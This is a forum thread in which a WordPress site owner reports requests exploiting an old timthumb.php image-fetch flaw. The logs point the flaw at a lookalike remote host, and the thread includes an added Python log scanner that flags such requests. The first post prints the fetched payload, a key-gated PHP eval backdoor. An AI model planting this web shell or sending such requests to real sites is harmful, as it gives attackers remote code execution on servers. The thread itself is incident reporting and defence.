[resolved] New Hack Attempt on Self Hosted WordPress Site!! (5 posts)

  1. pinchii
    Member
    Posted 2 years ago #

    Got this in my "hack prevention" scripts that I have running on the site

    Remote Address:91.224.160.182
    Remote Port:47762
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    And also

    Remote Address:91.224.160.182
    Remote Port:47764
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    The content of the File "images.php" is

    ::::BINARY CODE PAYLOAD::::
    <?php
    if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
    $cmd = $_POST["code"];
    eval (stripslashes($cmd));
    }
    ?>

    Looks like they are trying to gain CMD on my Apache server

    If you guys are getting the same, I suggest you block PHP files in your wp-content folder

    I posted the same thing on my blog along with what the image for that ::::binary code payload:::: actually looks like; look towards the bottom
    http://pinchii.com/home/2011/08/hack-attempt-on-pinchii-com/
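
The `src` value in the requests logged above names a host that begins with blogger.com but actually belongs to bloggera.net. As an added example (not part of the original post and not the poster's script), this Python check flags such requests in a log of that format; the allowlist and the two 192.0.2.x records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit
# Assumption: hosts the thumbnail script may fetch from (hypothetical allowlist).
ALLOWED_HOSTS = {"blogger.com", "flickr.com"}
THUMB_SCRIPTS = ("/thumb.php", "/timthumb.php")
# First record is the request quoted in the post; the other two are constructed.
SAMPLE_LOG = """\
Remote Address:91.224.160.182
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
Remote Address:192.0.2.10
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://img.blogger.com/a.jpg
Remote Address:192.0.2.11
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=/home/wp-content/uploads/a.jpg
"""

def host_allowed(host):
    """Exact match or true subdomain only; a substring match is not enough."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)

def classify(request_uri):
    """Return (verdict, detail) for one logged Request URI."""
    parts = urlsplit(request_uri)
    if not parts.path.lower().endswith(THUMB_SCRIPTS):
        return ("ignore", "")
    src = parse_qs(parts.query).get("src", [""])[0]
    target = urlsplit(src)
    host = target.hostname or ""
    if not host:
        return ("local", src)  # src is a path on this site, no remote fetch
    if not host_allowed(host):
        lookalike = any(a in host for a in ALLOWED_HOSTS)
        return ("suspicious", ("lookalike host: " if lookalike else "external host: ") + host)
    if target.path.lower().endswith((".php", ".phtml")):
        return ("suspicious", "script requested from " + host)
    return ("remote-ok", host)

def scan(log_text):
    """Pair each suspicious Request URI with the preceding Remote Address."""
    findings, addr = [], None
    for line in log_text.splitlines():
        key, _, value = line.partition(":")
        if key == "Remote Address":
            addr = value.strip()
        elif key == "Request URI":
            verdict, detail = classify(value.strip())
            if verdict == "suspicious":
                findings.append((addr, detail))
    return findings
```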

  2. esmi
    Forum Moderator
    Posted 2 years ago #

    It's not new. They're trying to use a known issue with older versions of timthumb.

  3. pinchii
    Member
    Posted 2 years ago #

    Really, I searched Google and didn't find anything

    Better safe than sorry, I guess :)

  4. pinchii
    Member
    Posted 2 years ago #

  5. That'd be the one :/
